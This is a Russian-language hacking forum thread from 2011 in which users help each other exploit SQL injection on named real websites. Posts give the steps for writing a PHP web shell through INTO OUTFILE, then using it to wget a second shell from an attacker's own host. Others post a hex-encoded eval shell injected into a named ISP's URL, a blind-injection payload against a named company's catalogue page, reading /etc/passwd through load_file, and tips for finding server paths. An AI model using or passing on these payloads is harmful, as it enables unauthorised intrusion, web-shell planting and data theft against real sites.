23.10.2011, 23:19
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает
, хто может обьяснить или где я могу почитать?
/threadnav119047-1-10.html
|
|
|
23.10.2011, 23:26
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
всем ку)
http://www.uralremstroy.ru/catalog.php?group_id=104
с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?
Заранее спасибо.
|
|
|
|
24.10.2011, 03:24
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
С нами:
8817310
Репутация:
108
|
|
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:
PHP код:
[COLOR="#000000"]SELECT '[COLOR="#0000BB"][/COLOR]' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;[/COLOR]
|
|
|
|
24.10.2011, 05:03
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от =Zeus=
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:
PHP код:
[COLOR="#000000"]SELECT '[COLOR="#0000BB"][/COLOR]' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;[/COLOR]
select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php
-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).
upd. "e" - двойные кавычки, чот форум одинарные ставит.
upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.
|
|
|
|
24.10.2011, 15:21
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от Melfis
select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php
-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).
upd. "e" - двойные кавычки, чот форум одинарные ставит.
upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.
Ошибка же.
Вот так правильно будет:
Код:
''
или вообще без кавычек
''
|
|
|
|
24.10.2011, 17:04
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Konqi
/threadnav119047-1-10.html
чёт я там не нашол нигде ответа
|
|
|
|
24.10.2011, 17:55
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от Boolean
Ошибка же.
Вот так правильно будет:
Код:
''
или вообще без кавычек
''
Сообщение от None
upd. "e" - двойные кавычки, чот форум одинарные ставит.
перепутал с q -__-
|
|
|
|
24.10.2011, 18:23
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от qaz
чёт я там не нашол нигде ответа
http://www.xakep.ru/post/52222/
|
|
|
|
24.10.2011, 23:16
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от z0mbie86
Что неправильно я делаю?
Код:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(SELECT/**/0x2533433F7068702532306576616C28245F52455554553545B636D645D293B25/**/INTO/**/OUTFILE/**/'/srv/www/vhosts/217.8.80.55/modules/gw/jindex.php')and'
А там есть вообще sql inj?
http://wifi.hm-ugratel.ru/?m[admin]&id=123
http://wifi.hm-ugratel.ru/?m[admin]&id=abc
http://wifi.hm-ugratel.ru/?m[admin]&id=123'
http://wifi.hm-ugratel.ru/?m[admin]&id=abc'
Разницу чувствуешь? я - нет. Если и есть, то жесть какая слепая.
|
|
|
|
25.10.2011, 00:27
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от smirk
всем ку)
http://www.uralremstroy.ru/catalog.php?group_id=104
с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?
Заранее спасибо.
Там 4-ветка, и только блинд
http://www.uralremstroy.ru/catalog.php?group_id=14)+and+substring(version(),1 ,1)=4--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
